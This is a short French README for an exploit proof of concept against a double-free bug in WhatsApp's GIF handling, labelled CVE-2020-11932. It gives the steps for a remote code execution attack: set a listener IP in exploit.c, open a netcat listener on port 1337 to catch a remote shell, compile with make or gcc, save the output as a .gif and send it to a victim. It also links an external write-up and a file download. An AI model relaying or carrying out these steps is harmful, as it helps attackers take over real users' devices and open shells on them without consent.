
Preuve de concept d'exploit pour CVE-2020-11932, une vulnérabilité de double libération dans le traitement des GIFs WhatsApp, permettant l'exécution de code à distance via un fichier .gif malveillant.
Bug de double libération (Double-Free) dans le PoC d'exploit WhatsApp.
#Note : Assurez-vous de définir l'adresse IP du listener dans exploit.c afin d'obtenir un shell
nc -lvp 1337 ou n'importe quel port.
puis compilez.
make
ou
gcc -o exploit egif_lib.c exploit.c
puis exécutez ./exploit et sauvegardez le contenu sous .gif
et envoyez à la victime.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing